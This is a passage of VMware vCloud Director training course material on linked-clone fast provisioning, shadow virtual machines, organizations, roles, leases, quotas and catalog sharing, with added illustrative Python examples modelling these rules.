Fast provisioning in vSphere 5.1 has different limits than fast provisioning under vSphere 5.0. Under vSphere 5.0, if fast provisioning is used, the cluster size is limited to eight hosts. Under vSphere 5.1 the cluster size can be a maximum of 32 hosts, even if fast provisioning is used.

If the provider VDC on which the organization VDC is based contains any VMware vSphere® VMFS datastores connected to more than eight hosts under vSphere 5.0, a power-on operation for a virtual machine might fail. vSphere 5.0 datastores should be connected to a maximum of eight hosts.

VMware recommends separating datastores reserved for fast provisioning from datastores reserved for full-clone vApp workloads, for manageability and chargeback purposes. Additionally, if vCloud Director is deployed on block-based storage, VMware recommends using a vSphere DRS cluster to back a dedicated provider VDC for fast provisioning. All organization VDCs are created from the dedicated provider VDC and should have Enable Fast Provisioning selected.

When you select Enable Fast Provisioning on all organization VDCs based on a dedicated provider VDC, vCloud Director allows the implementation of linked clones across the cluster. The use of fast provisioning on all organization VDCs attached to a single provider VDC makes it easier for the administrator to ensure that this dedicated cluster remains under the eight-host limit. The administrator can configure other provider VDCs not to use linked clones. These clusters, where fast provisioning is disabled, can be larger than eight hosts. Applications that are write-intensive perform better when hosted on provider VDCs that do not have fast provisioning enabled.

NOTE

Although vSphere 5.1 has an expanded limit of 32 hosts per cluster when fast provisioning is used, administrators should still plan to start their resource clusters at less than full size to leave space for future expansion.

Provisioning Times

Provisioning should be near instantaneous when provisioning to the same datastore. Provisioning a virtual machine to a different datastore triggers creation of shadow virtual machines if they do not already exist on the target datastore. The shadow virtual machine is a full copy of the virtual machine on the target datastore. After a shadow virtual machine exists in the target datastore, subsequent provisioning of the virtual machine occurs instantaneously, as in the same-datastore case.

VMware recommends that the most frequently provisioned vApp templates be preprovisioned across the datastores for the organization, to achieve a consistently instantaneous provisioning experience.

Performance Implications

Linked-clone performance varies. Sometimes linked clones can perform better than full clones, depending on the I/O profile of the application workload. One reason for potentially greater performance is metadata caching. On virtual machine startup, metadata dictating which file to access to get data is written to the ESXi copy-on-write heap. When a virtual machine does a virtual SCSI read and hits the metadata cache, each virtual read results in a single physical read. However, if an ESXi cache miss occurs, a virtual read results in multiple physical reads for a virtual machine reading across many disk sectors, causing additional overhead. Linked-clone performance can be further boosted through storage array caching, which can cause commonly used base disks to be read from the storage array's memory cache instead of from disk. Ample storage array cache greatly benefits an environment using linked clones.

Scalability Limitations

• Tree width. Although there is no limit to the width of a tree, a datastore can fill up if a tree gets too wide. If the datastore fills up, no clones can be created. The problem of a full datastore can be mitigated by using shadow virtual machines to allow cross-datastore provisioning.

• Tree depth. Linked-clone tree depth is kept at a maximum of 31. A thirty-second leaf node automatically creates a new base disk.

• Eight-host limit. There is an eight-host limit imposed by vSphere 5.0 when using SAN storage. This in turn limits the maximum cluster size to eight hosts.

• Fast provisioning technology is based on snapshot hierarchies. Snapshot hierarchies are composed of several VMDKs organized as a chain with one or more common base disks, each of which is opened in read-only mode. The top-level disk (called a delta disk) is opened in exclusive mode. Files opened in read-only locking mode cannot be opened by more than eight hosts, so the same limitation applies to VMFS-based linked clones. This limitation does not apply when vSphere uses NFS storage.

• Single datastore. Linked clones can be used only in a single datastore. The use of shadow virtual machines allows for cross-datastore provisioning. Because shadow virtual machines are full copies of the source virtual machines, sizing considerations for preprovisioning shadow virtual machines across datastores should be made.

• vSphere Storage vMotion. vSphere Storage vMotion in ESXi 5.0 has been improved to support migration of linked clones. However, the migration of linked clones should be invoked only in the vCloud Director layer, through the REST API Relocate_VM. When invoking the Relocate_VM API to migrate linked clones, ensure that the target organization VDC is part of the same provider VDC as the source organization VDC, or that the target organization VDC is backed by a provider VDC that has the same datastore where the source vApp resides. If neither condition is met, the API call fails.

VMware does not recommend or support VMware vSphere® vMotion® migration of linked clones in the vSphere layer. Even if the datastores are part of a datastore cluster enabled with vSphere Storage DRS, vCloud Director-provisioned linked clones are ignored by vSphere Storage DRS in vSphere 5.0. Under vSphere 5.1, vSphere Storage DRS can be used to automatically balance linked clones between datastores.

Some in-guest operations can increase delta disk sizes and fill up datastores. An example is a defragmenter running in the guest operating system. The virtual machine might start with very small VMDK files built off linked clones, but as the defragmenter runs, most of the disk is rewritten. The modification of all disk sectors causes the VMDK of the linked clone delta disk to inflate back to full size.
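The shadow virtual machine, tree-depth and eight-host rules above interact, and it helps to see them as one decision. The following planner is an added example written for this page, not vCloud Director code: it simulates, for each deployment request, whether vCloud Director can hand out a near-instant linked clone or must first pay for a full copy (a shadow virtual machine on another datastore, or a fresh base disk once the tree is 31 levels deep), and it refuses a VMFS datastore that vSphere 5.0 shares across more than eight hosts. Datastore names, host counts and template names are constructed for illustration.

```python
"""Fast-provisioning planner modelled on the rules in this module.

Added example, not vCloud Director code: it simulates when vCloud Director
can hand out a near-instant linked clone and when it must first pay for a
full copy (a shadow virtual machine on another datastore, or a fresh base
disk once a linked-clone tree is 31 levels deep). Datastore names, host
counts and template names are constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

MAX_TREE_DEPTH = 31           # a 32nd leaf node automatically gets a new base disk
VMFS_READONLY_HOST_LIMIT = 8  # vSphere 5.0: a read-only VMFS file can be open on at most 8 hosts


@dataclass
class Datastore:
    name: str
    fs: str                # "VMFS" or "NFS"; the 8-host limit applies to VMFS only
    hosts: int             # ESXi hosts that have the datastore mounted
    vsphere: str = "5.0"   # version of the hosts backing it


@dataclass
class Disk:
    name: str
    datastore: str
    depth: int = 0                    # 0 = base disk, n = delta disk n levels below the base
    parent: Optional["Disk"] = None   # the disk this delta was cloned from


@dataclass
class Planner:
    datastores: Dict[str, Datastore]
    # (template, datastore) -> base disk on that datastore: the catalog copy or a shadow VM
    bases: Dict[Tuple[str, str], Disk] = field(default_factory=dict)
    ops: List[str] = field(default_factory=list)  # what vCloud Director would do, in order

    def register_template(self, template: str, datastore: str) -> Disk:
        """The catalog's copy of a template lives on exactly one datastore."""
        base = Disk(f"{template}@{datastore}", datastore)
        self.bases[(template, datastore)] = base
        return base

    def _full_copy(self, template: str, source: Disk, target: str, why: str) -> Disk:
        """A full clone: slow, consumes the whole image size, and roots a new tree."""
        base = Disk(f"{template}@{target}#{len(self.ops)}", target)
        self.bases[(template, target)] = base
        self.ops.append(f"full copy of {source.name} to {target} ({why})")
        return base

    def deploy(self, template: str, target: str, source: Optional[Disk] = None) -> Disk:
        """Plan one deployment onto `target`, cloning `source` (default: the template's base)."""
        ds = self.datastores[target]
        # Under vSphere 5.0 a VMFS datastore attached to more than 8 hosts can make power-on fail.
        if ds.fs == "VMFS" and ds.vsphere.startswith("5.0") and ds.hosts > VMFS_READONLY_HOST_LIMIT:
            raise ValueError(f"{target}: VMFS shared by {ds.hosts} hosts exceeds the "
                             f"{VMFS_READONLY_HOST_LIMIT}-host limit for linked clones")

        if source is None:
            source = self.bases.get((template, target))
        if source is None:
            # Nothing of this template on the target datastore yet: build a shadow VM first.
            origins = [d for (t, _), d in self.bases.items() if t == template]
            if not origins:
                raise KeyError(f"template {template!r} is not in any catalog")
            source = self._full_copy(template, origins[0], target, "shadow VM, cross-datastore")
        elif source.datastore != target:
            # Cloning an existing VM that lives elsewhere needs a shadow copy just the same.
            source = self._full_copy(template, source, target, "shadow VM, cross-datastore")
        elif source.depth + 1 > MAX_TREE_DEPTH:
            # The tree is already 31 deep: vSphere starts a new base disk instead of a 32nd delta.
            source = self._full_copy(template, source, target, "tree depth limit reached")

        clone = Disk(f"{template}-clone{len(self.ops)}", target, source.depth + 1, source)
        self.ops.append(f"linked clone {clone.name} from {source.name} (near instantaneous)")
        return clone


if __name__ == "__main__":
    p = Planner({"ds-1": Datastore("ds-1", "VMFS", 8), "ds-2": Datastore("ds-2", "NFS", 16, "5.1")})
    p.register_template("web", "ds-1")
    p.deploy("web", "ds-1")   # instant: the base disk is already here
    p.deploy("web", "ds-2")   # shadow VM first, then the clone
    p.deploy("web", "ds-2")   # instant: the shadow VM now serves as the base
    print("\n".join(p.ops))
```

Reading `ops` after a batch of requests shows where the slow full copies land, which is exactly the information an administrator needs when deciding which templates to preprovision on which datastores.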

Linked Clones, Shadow Virtual Machines, and Storage DRS (Slide 4-28)

• vSphere Storage DRS supports linked clones only with vCloud Director 5.x.

• Use the vCloud API to initiate vSphere Storage vMotion migration for linked clones, to preserve the linked-clone state.

• Manual migration of a virtual machine that is built on linked clones can cause undesirable effects, such as the inflation of delta disks.

• vCloud Director does not support linked-clone configurations that span across datastores.

• Linked clones can be migrated between VMFS3 and VMFS5.


If there is a cross-datastore linked clone configuration, vSphere Storage DRS does not recommend placing linked clones on a datastore that contains neither the base disk nor a shadow virtual machine copy of the base disk. A cross-datastore linked clone configuration might occur when vCloud Director APIs create it.

Linked clones can be migrated between VMFS3 and VMFS5 file systems. Several factors enter into the decision-making process when vSphere Storage DRS is determining where to migrate a linked clone: the amount of data being moved, the amount of space freed on the source, and the additional amount of space required on the destination are all considered. The major factor is whether a shadow virtual machine of the base disk already exists on the destination. vSphere Storage DRS provides this support, and format conversions are handled automatically at the platform level.
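The Relocate_VM precondition stated above (same provider VDC, or a target provider VDC that also backs the source datastore) is cheap to check before the call, and doing so turns an opaque API failure into a clear message. The block below is an added example, not VMware's code: it encodes that check over a constructed inventory and then builds the vCloud API request (POST to the VM's `action/relocate` link with a RelocateParams body that references the target datastore). The inventory, hrefs, organization VDC names and session token are constructed; the request is returned, not sent.

```python
"""Pre-flight check and request construction for the vCloud API VM relocate call.

Added example, not VMware's code. It encodes the rule above: a linked-clone
VM may be relocated only if the target organization VDC shares a provider VDC
with the source organization VDC, or the target's provider VDC also backs the
datastore the source vApp sits on. Inventory, hrefs, names and the session
token are constructed; the request is built and returned, not sent.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, Tuple

VCLOUD_NS = "http://www.vmware.com/vcloud/v1.5"
RELOCATE_CONTENT_TYPE = "application/vnd.vmware.vcloud.relocateVmParams+xml"
API_VERSION = "5.1"
ET.register_namespace("", VCLOUD_NS)


@dataclass
class ProviderVdc:
    name: str
    datastores: Dict[str, str]   # datastore name -> datastore reference href


@dataclass
class OrgVdc:
    name: str
    provider_vdc: str            # the single provider VDC that backs it


@dataclass
class Vm:
    href: str                    # constructed, e.g. https://vcd.example.com/api/vApp/vm-<id>
    org_vdc: str
    datastore: str               # where its linked-clone chain currently lives


def relocate_target_ok(vm: Vm, target_org_vdc: str, org_vdcs: Dict[str, OrgVdc],
                       providers: Dict[str, ProviderVdc]) -> Tuple[bool, str]:
    """Apply the two conditions under which vCloud Director accepts the relocate."""
    src, dst = org_vdcs[vm.org_vdc], org_vdcs[target_org_vdc]
    if src.provider_vdc == dst.provider_vdc:
        return True, "source and target organization VDCs share a provider VDC"
    if vm.datastore in providers[dst.provider_vdc].datastores:
        return True, f"provider VDC {dst.provider_vdc} also backs datastore {vm.datastore}"
    return False, (f"provider VDC {dst.provider_vdc} is not {src.provider_vdc} and "
                   f"does not contain datastore {vm.datastore}")


def relocate_params_xml(datastore_href: str) -> bytes:
    """RelocateParams body: the payload is a reference to the target datastore."""
    root = ET.Element(f"{{{VCLOUD_NS}}}RelocateParams")
    ET.SubElement(root, f"{{{VCLOUD_NS}}}Datastore", href=datastore_href)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def target_datastore_href(body: bytes) -> str:
    """Read the datastore reference back out of a RelocateParams body."""
    return ET.fromstring(body).find(f"{{{VCLOUD_NS}}}Datastore").get("href")


def build_relocate_request(vm: Vm, target_org_vdc: str, target_datastore: str,
                           org_vdcs: Dict[str, OrgVdc], providers: Dict[str, ProviderVdc],
                           session_token: str) -> dict:
    """Return the POST vCloud Director expects, or raise before making a call that would fail."""
    ok, reason = relocate_target_ok(vm, target_org_vdc, org_vdcs, providers)
    if not ok:
        raise ValueError("relocate would be rejected: " + reason)
    provider = providers[org_vdcs[target_org_vdc].provider_vdc]
    if target_datastore not in provider.datastores:
        raise ValueError(f"datastore {target_datastore} is not part of provider VDC {provider.name}")
    return {
        "method": "POST",
        "url": vm.href + "/action/relocate",
        "headers": {
            "Accept": f"application/*+xml;version={API_VERSION}",
            "Content-Type": RELOCATE_CONTENT_TYPE,
            "x-vcloud-authorization": session_token,   # session token obtained from POST /api/sessions
        },
        "body": relocate_params_xml(provider.datastores[target_datastore]),
    }


def sample_inventory() -> Tuple[Dict[str, ProviderVdc], Dict[str, OrgVdc], Vm]:
    """Constructed inventory: two provider VDCs share one datastore, a third shares none."""
    base = "https://vcd.example.com/api/admin/extension/datastore/"
    providers = {
        "pvdc-gold": ProviderVdc("pvdc-gold", {"ds-gold-1": base + "1", "ds-gold-2": base + "2"}),
        "pvdc-silver": ProviderVdc("pvdc-silver", {"ds-silver-1": base + "3", "ds-gold-2": base + "2"}),
        "pvdc-bronze": ProviderVdc("pvdc-bronze", {"ds-bronze-1": base + "4"}),
    }
    org_vdcs = {
        "ovdc-a": OrgVdc("ovdc-a", "pvdc-gold"), "ovdc-b": OrgVdc("ovdc-b", "pvdc-gold"),
        "ovdc-c": OrgVdc("ovdc-c", "pvdc-silver"), "ovdc-d": OrgVdc("ovdc-d", "pvdc-bronze"),
    }
    vm = Vm("https://vcd.example.com/api/vApp/vm-0001", "ovdc-a", "ds-gold-2")
    return providers, org_vdcs, vm
```

The session token in `x-vcloud-authorization` is equivalent to the caller's credentials for the life of the session, so the script that sends this request must hold it as carefully as the password it was obtained with and must run as a system administrator, since relocation is an administrative operation.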


Preparing Hosts (Slide 4-29)

• When you create the first provider VDC, vCloud Director prepares the ESXi hosts in the DRS cluster.

• To prepare an ESXi host, vCloud Director installs the vCloud Director agent on the host.

• When the Preparing Hosts dialog box appears, you must provide the root user ID and password of the ESXi hosts.


Lab 3: Creating Provider Virtual Data Centers (Slide 4-30)

Create provider virtual data centers


Key Points (Slide 4-32)

• Provider VDCs provide resources to organization VDCs.

• Each provider VDC must be built from a resource pool.

• Each provider VDC must have storage.

• A provider VDC must have at least one external network.

• Resource pools cannot span multiple vSphere DRS clusters.

• All resource pools should be at the same level.

• Storage should be divided into tiers based on cost and speed.

• Use linked clones to provision new virtual machines from a template without replicating the entire image.

• A shadow virtual machine is a full clone that is created when a linked clone is requested on a destination datastore that is different from the source datastore.

Questions?

MODULE 5

VMware vCloud Director Organizations (Slide 5-1)


Importance (Slide 5-3)

You can leverage existing VMware vSphere® infrastructure resources to deliver IT services in a private or public infrastructure as a service cloud. But you must first understand the technical constructs that VMware® vCloud Director® provides.


Module Lessons (Slide 5-4)

Lesson 1: Organizations

Lesson 2: Organization Virtual Data Centers

Lesson 3: vApp Templates

Lesson 4: Building and Publishing vApps

Lesson 5: Deploying and Running vApps

Lesson 6: Additional Organization VDC Networking


Lesson 1: Organizations (Slide 5-5)


About Organizations (Slide 5-7)

An organization is a logical group of all users (consumers) to which resources will be presented.

An organization has these characteristics:

• Enforces a security boundary

• Includes appropriate resources and controls

• Includes one or more content repositories (catalogs)

(Figure: the organization "Finance", with its users, access control, catalogs, and provisioned policies)


An organization is a logical group of users to which IT services are presented. Organizations provide a security boundary, so that appropriate resources and controls can be set up for a given group of users.

Each organization has a unique login URL. Users, whether locally created or imported from a Lightweight Directory Access Protocol (LDAP) server, exist and operate only in this organization. The settings in each organization are independent from the settings made for other organizations. (An exception is Simple Mail Transfer Protocol (SMTP) settings, which can be made per organization or inherited from the VMware® vCloud Director® default SMTP server.)

Organizations are isolated tenants in the cloud. Each organization has its own users, access control, catalogs, provisioning policies, resources, and networks. Resources come from organization virtual data centers (VDCs). Each organization VDC gets its resources from a single provider VDC. Each organization can have multiple organization VDCs.

(Figure: an organization's VDCs, each running vApps made up of virtual machines on a vApp network, on top of vSphere)

Organization Portals (Slide 5-8)

Each organization has a dedicated portal.


The vCloud Director system administrator creates the organization and provisions resources. After the organization is created, the system administrator distributes the organization URL to the administrator assigned to the organization (called the organization administrator). Using the URL, the organization administrator logs in to the organization portal and sets it up, configures resource use, adds users, and selects organization-specific policies and settings. Organization member users (consumers) can then create, use, and manage IT services packaged as VMware vSphere® vApps™.

When you select the name of the organization, do not worry about the name being visible to other organizations. Multitenancy means that users must know the name of their organization before they can provision resources or services. A user in one organization cannot learn the names of other organizations through the vCloud Director user interface. The name is part of the login URL and is not an access control, so do not treat it as a secret. Plan to create an organization for each tenant of the cloud. Only the vCloud Director system administrator can create an organization.

The organization name is used in a URL whenever a user browses to the organization portal. As a result, the organization name must be suitable as part of a URL. Do not use spaces or special characters in an organization name; underscores and hyphens are permitted. Because the name is part of a URL, the best practice is to make the name as short as possible.

Organization Users (Slide 5-9)

• Organization users can be created in vCloud Director or by using an LDAP server.

• Each user has an administrator-assigned role.

Predefined Role              Privileges
System Administrator         Creates and manages provider VDCs, external networks, network pools, organizations, organization VDCs, organization VDC networks, and catalogs
Organization Administrator   Creates and manages organization users, catalogs, VMware vSphere® vApp templates, and organization VDC networks
Catalog Author               Creates, manages, and uses catalogs and vApps
vApp Author                  Creates, manages, and uses vApps
vApp User                    Similar to vApp Author, except that it cannot create vApps or change CPU, memory, or disk
Console Access Only          Access to the consoles of vApp virtual machines, with no power functions

vCloud Director uses roles, and their associated rights, to determine which users and groups can perform which operations. System administrators can create and modify roles. System administrators and organization administrators can assign roles to users and groups in an organization.

Organization Policies (Slide 5-10)

Leases, quotas, and limits help prevent users from depleting or monopolizing an organization's resources.

Policy type   Settings
Leases        vApp runtime; vApp and vApp template storage; storage cleanup location
Quotas        Running virtual machines per user; stored virtual machines per user
Limits        Resource-intensive operations per user; resource-intensive operations per organization; simultaneous connections per virtual machine

Leases, quotas, and limits constrain the ability of organization users to consume storage and processing resources. These settings prevent users from depleting or monopolizing an organization's resources.

Leases provide a level of control over an organization's storage and compute resources by specifying the maximum amount of time that vApps can be running and that vApps and vApp templates can be stored.

The goal of a runtime lease is to prevent inactive vApps from consuming compute resources. For example, if a user starts a vApp and goes on vacation without stopping it, the vApp continues to consume resources. A runtime lease begins when a user starts a vApp. When a runtime lease expires, vCloud Director stops the vApp.

The goal of a storage lease is to prevent unused vApps and vApp templates from consuming storage resources. A vApp storage lease begins when a user stops the vApp. Storage leases do not affect running vApps. A vApp template storage lease begins when a user adds the vApp template to a vApp, adds the vApp template to a workspace, or downloads, copies, or moves the vApp template. When a storage lease expires, vCloud Director marks the vApp or vApp template as expired, or deletes the vApp or vApp template, depending on the organization policy that you set.

Quotas determine how many virtual machines each user in the organization can store and power on in the organization's VDCs. The quotas that administrators specify act as the default for all new users added to the organization.

Limits prevent resource-intensive operations from affecting all the users in an organization and also provide a defense against denial-of-service (DoS) attacks. Certain vCloud Director operations are more resource intensive than others; an example is the copying or moving of a vApp. For performance or security reasons, you can also limit the number of simultaneous connections to a virtual machine from the vCloud Director remote console. Limiting the number of simultaneous connections does not limit Virtual Network Computing (VNC) or Remote Desktop Protocol (RDP) connections made directly to the guest. Unlike the other usage policies, limits cannot be set by organization administrators. They must be set by system administrators and cannot be modified by organization administrators.
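The three policy types above are easiest to reason about as one small enforcement loop: the runtime lease clock starts at power-on, the storage lease clock starts at power-off, quotas are checked before a power-on or a store, and limits cap concurrency. The block below is an added example written for this page, not vCloud Director's own enforcement code. Time is an integer hour counter so the lease clocks are easy to follow; the policy numbers and the vApp records are constructed, and template storage leases (which follow the same clock) are left out for brevity.

```python
"""Lease, quota and limit enforcement modelled on this lesson.

Added example, not vCloud Director's enforcement code. Time is an integer
hour counter so the lease clocks are easy to follow; the policy numbers and
vApp records are constructed. Storage leases are applied to vApps only.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass
class OrgPolicy:
    runtime_lease_h: int             # max hours a vApp may keep running
    storage_lease_h: int             # max hours a stopped vApp may be kept
    expired_action: str              # "move_to_expired_items" or "delete"
    running_vms_per_user: int        # quota
    stored_vms_per_user: int         # quota
    intensive_ops_per_user: int      # limit on in-flight copy/move vApp operations
    intensive_ops_per_org: int
    console_connections_per_vm: int  # vCloud Director remote console sessions, not in-guest RDP/VNC


@dataclass
class VApp:
    name: str
    owner: str
    vm_count: int
    state: str                         # "running", "stopped", "expired" or "deleted"
    started_at: Optional[int] = None   # runtime lease clock starts when the vApp starts
    stopped_at: Optional[int] = None   # storage lease clock starts when the vApp stops


def enforce_leases(vapps: List[VApp], policy: OrgPolicy, now: int) -> List[str]:
    """Stop vApps whose runtime lease ran out; expire or delete those whose storage lease did."""
    actions = []
    for v in vapps:
        if v.state == "running" and now - v.started_at >= policy.runtime_lease_h:
            v.state, v.started_at, v.stopped_at = "stopped", None, now   # storage clock starts now
            actions.append(f"stop {v.name}: runtime lease expired")
        elif v.state == "stopped" and now - v.stopped_at >= policy.storage_lease_h:
            v.state = "deleted" if policy.expired_action == "delete" else "expired"
            actions.append(f"{v.state} {v.name}: storage lease expired")
    return actions


def vm_count(user: str, vapps: List[VApp], states: Iterable[str]) -> int:
    return sum(v.vm_count for v in vapps if v.owner == user and v.state in set(states))


def can_power_on(user: str, vapps: List[VApp], policy: OrgPolicy, new_vms: int) -> bool:
    """Running quota counts VMs in running vApps (assumption: expired vApps count as not running)."""
    return vm_count(user, vapps, {"running"}) + new_vms <= policy.running_vms_per_user


def can_store(user: str, vapps: List[VApp], policy: OrgPolicy, new_vms: int) -> bool:
    """Stored quota counts VMs in running and stopped vApps (assumption, see lead-in)."""
    return vm_count(user, vapps, {"running", "stopped"}) + new_vms <= policy.stored_vms_per_user


class LimitEnforcer:
    """Caps concurrent resource-intensive operations per user and per organization,
    and concurrent remote-console sessions per virtual machine."""

    def __init__(self, policy: OrgPolicy):
        self.policy = policy
        self.ops_by_user: Dict[str, int] = {}
        self.ops_in_org = 0
        self.consoles: Dict[str, int] = {}

    def start_intensive_op(self, user: str) -> bool:
        if self.ops_in_org >= self.policy.intensive_ops_per_org:
            return False   # the org-wide cap keeps one busy user from starving the rest
        if self.ops_by_user.get(user, 0) >= self.policy.intensive_ops_per_user:
            return False
        self.ops_by_user[user] = self.ops_by_user.get(user, 0) + 1
        self.ops_in_org += 1
        return True

    def end_intensive_op(self, user: str) -> None:
        self.ops_by_user[user] -= 1
        self.ops_in_org -= 1

    def open_console(self, vm: str) -> bool:
        if self.consoles.get(vm, 0) >= self.policy.console_connections_per_vm:
            return False
        self.consoles[vm] = self.consoles.get(vm, 0) + 1
        return True

    def close_console(self, vm: str) -> None:
        self.consoles[vm] -= 1


def sample_vapps() -> List[VApp]:
    """Constructed records: two vApps for alice (one running, one stopped) and one for bob."""
    return [VApp("a", "alice", 2, "running", started_at=0),
            VApp("b", "alice", 1, "stopped", stopped_at=0),
            VApp("c", "bob", 3, "running", started_at=50)]


if __name__ == "__main__":
    policy = OrgPolicy(72, 24, "move_to_expired_items", 5, 10, 2, 3, 2)
    vapps = sample_vapps()
    for hour in (72, 96):
        print(hour, enforce_leases(vapps, policy, hour))
```

Note the ordering in `enforce_leases`: a vApp stopped by its runtime lease gets a fresh storage-lease clock in the same pass rather than being expired immediately, which is the behaviour the text describes (the storage lease begins when the vApp stops).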


Expired Items Management (1) (Slide 5-11)

• vApps and vApp templates whose storage leases expire are handled as configured under Leases.

• These vApps are either moved to an expired holding area or deleted.

• The vCloud Director system administrator and the organization administrator can restore to the organization a vApp that is stored in the Expired Items storage area.


Leases combined with management of expired items enable vCloud Director administrators and organization administrators to prevent individual users from consuming too much of a cloud's resources.

Expired Items Management (2) (Slide 5-12)

• After a vApp stops running, the clock starts for how long it will remain in the user's My Cloud.

• This type of management can be used to keep organizations and users from cluttering the system with too many vApps and wasting resources.


Expired Items Management (3) (Slide 5-13)

• After a vApp or vApp template has been moved into Expired Items, either the cloud system administrator or the organization administrator can renew it.

• The Expired Items inventory appears under My Cloud.

• vApps can also be deleted from Expired Items.


Catalogs (Slide 5-14)

Catalogs store the following:

• vApp templates, which are used to deploy workloads to user clouds

• Media (ISO files and FLP files) that can be inserted into CD/DVD and diskette drives on virtual machines; media can also include other files, such as scripts

Catalogs can be shared with all users in the organization or with specific users.

Catalogs can be shared with other organizations.

Catalogs can be published to other vCloud Director clouds.

(Figure: catalog objects, showing vApp templates such as a Windows template, web server vApps, and database vApps, plus media)


vCloud Director includes a content repository. The content repository is a component in the vCloud Director storage subsystem. It provides an abstraction of the underlying datastores and offers features to store, search, retrieve, and remove content.

Content is delivered to consumers in the form of catalogs. A catalog is a container for vApp templates and media files in an organization.

Catalogs can be shared, so the vApp templates in them are available to other users in the organization. Catalogs can also be published, so members of other organizations can have read access to the vApps, provided the organization is configured to allow publishing. Catalogs can also be published to other vCloud Director clouds.

Catalog Availability (Slide 5-15)

Catalogs are made available in four ways:

• Private: Available to the owner or creator of the catalog only

• Public: Available to other organizations in the cloud

• Shared: Available to specific other users in your organization, or to other organizations in your cloud

• Published: Available to subscribers in other vCloud Director clouds


Organization Catalog Sharing (Slide 5-16)

• The system administrator allows or disallows public sharing and publishing of organization catalogs.

• If sharing is allowed, the organization's catalogs can be shared so that they are visible to other organizations. Catalogs can be made public to specific organizations or to all organizations.

• Catalogs can still be shared within an organization even if sharing with other organizations is not allowed.

• Sharing can be set or changed at any time.


Organization Catalog Publishing (Slide 5-17)

• Publishing allows a catalog to be shared with organizations in other vCloud Director clouds.

• The system administrator also controls whether an organization can subscribe to catalogs that are externally published.

• Publishing can be set or changed at any time.


Catalog Best Practices (Slide 5-18)

Create an administration organization to do the following:

• Share public catalogs that offer official build templates to the organization administrators of all organizations

For each consumer organization, follow these practices:

• Create a shared catalog for local templates
• Use the shared catalog provided by the administration organization to create standard templates
• Recognize that only the Organization Administrator role and the vCloud Director system administrator can view shared and published catalogs

Be very selective about whom you allow to publish catalogs to external clouds.

Be very selective about whom you allow to subscribe from external clouds.
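The sharing, publishing, and visibility rules from the three catalog slides above, modelled as a small policy evaluator. This is an added example, not vCloud Director code or its API: the SystemPolicy, Catalog, and User classes, the role strings, and the catalog and organization names are constructed for illustration.

```python
"""Catalog sharing, publishing, and visibility rules from slides 5-16 to 5-18,
modelled as a policy evaluator. Added example, not vCloud Director code; the
classes, role strings, and sample names are constructed for illustration."""
from dataclasses import dataclass, field

SYSTEM_ADMIN = "System Administrator"
ORG_ADMIN = "Organization Administrator"
ALL_ORGS = "*"   # marker for "shared with all organizations"


@dataclass
class SystemPolicy:
    """Switches the system administrator sets for the whole cloud."""
    sharing_allowed: bool      # catalogs may be shared with other organizations
    publishing_allowed: bool   # catalogs may be published to other vCloud Director clouds
    subscribe_allowed: bool    # organizations may subscribe to externally published catalogs


@dataclass
class Catalog:
    name: str
    owner_org: str
    shared_with: set = field(default_factory=set)   # organization names or ALL_ORGS
    published: bool = False


@dataclass
class User:
    name: str
    org: str
    role: str


def share(policy, catalog, target_org):
    """Share a catalog with an organization. Sharing inside the owning organization
    is always possible; sharing with another organization, or with all of them
    (ALL_ORGS), needs the system-level switch. Returns True when applied."""
    if target_org != catalog.owner_org and not policy.sharing_allowed:
        return False
    catalog.shared_with.add(target_org)
    return True


def publish(policy, catalog):
    """Publish a catalog so organizations in other clouds can subscribe to it.
    Returns True when the catalog was published."""
    if not policy.publishing_allowed:
        return False
    catalog.published = True
    return True


def can_subscribe_externally(policy):
    """Whether organizations in this cloud may subscribe to catalogs published elsewhere."""
    return policy.subscribe_allowed


def visible_shared_catalogs(catalogs, user):
    """Names of catalogs shared from other organizations that this user can see.
    Only the Organization Administrator role and the system administrator see
    shared catalogs (slide 5-18); a catalog owned by the user's own organization is
    governed by ordinary catalog rights and is not part of this check."""
    foreign = [c for c in catalogs if c.owner_org != user.org]
    if user.role == SYSTEM_ADMIN:
        return [c.name for c in foreign]
    if user.role != ORG_ADMIN:
        return []
    return [c.name for c in foreign
            if ALL_ORGS in c.shared_with or user.org in c.shared_with]
```

The point of the model is the precedence: the system-level switch decides whether cross-organization sharing or publishing is possible at all, and the role check decides who sees the result; local sharing inside the owning organization is unaffected by the switch.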


Review of Learner Objectives (Slide 5-19)

You should be able to meet the following objectives:

• Create a vCloud Director organization
• Add a catalog to an organization


Lesson 2: Organization Virtual Data Centers (Slide 5-20)


Learner Objectives (Slide 5-21)

By the end of this lesson, you should be able to meet the following objectives:

• Create an organization virtual data center (VDC)
• Configure organization VDC networking


Organization VDCs (Slide 5-22)

• An organization VDC is a subset of the resources in a provider VDC.
• Provider VDC resources are allocated to tenants in the form of organization VDCs.
• Before you can create an organization VDC, you must create an organization.
• Each organization can have multiple organization VDCs.
• Each organization VDC can belong to only a single organization.
• vApps, vApp templates, and catalogs cannot be created in an organization until an organization VDC exists.


An organization VDC provides resources to an organization and is partitioned from a provider VDC. Organization VDCs provide an environment where virtual systems can be stored, deployed, and operated. They also provide storage for virtual media, such as floppy disks and CDs.

A single organization can have multiple organization VDCs associated with it.

Organization VDCs are used by vCloud Director to partition provider VDCs and allocate resources to an organization. vCloud Director uses VMware vSphere® resource pools as the basic construct to partition these resources.

You must create the organization before you can create an organization VDC. Each organization can have multiple organization VDCs, but each organization VDC is local to only one organization.

When creating an organization VDC, you must first select the provider VDC that will provide resources. From a vSphere perspective, both provider and organization VDCs are resource pools and have a parent-child relationship.

Purpose of an Organization VDC (Slide 5-23)

Organization VDCs enable the cloud provider to securely share provider VDC resources with multiple tenants. The provider can do so with the following:

• Predefined allocations
• Ensured control of the tenant's performance and capacity requirements

[Figure: organization A with VDC1 (Tier1) and VDC2 (Tier2), each holding a vApp]

A single cloud tenant can have multiple organization VDCs. The advantages include:

• They consume multiple classes with differing SLAs.


The organization VDC enables the cloud provider to share provider VDC resources with multiple tenants. Organization VDCs maintain security, enable the provider to set predefined allocations, and ensure that the tenant’s performance and capacity requirements can be controlled.

Tenants do not have the ability to see the actual resources in the provider VDC. Their visibility is only into which resources are available in the organization VDC.

Like a provider VDC, the organization VDC is a container for resources, but the way that resources are allocated can be specified. A network pool can be added to an organization VDC with limits on the number of networks that can be created. You can also specify the maximum amount of storage that the organization VDC can consume.

• The cost is based on computed needs.
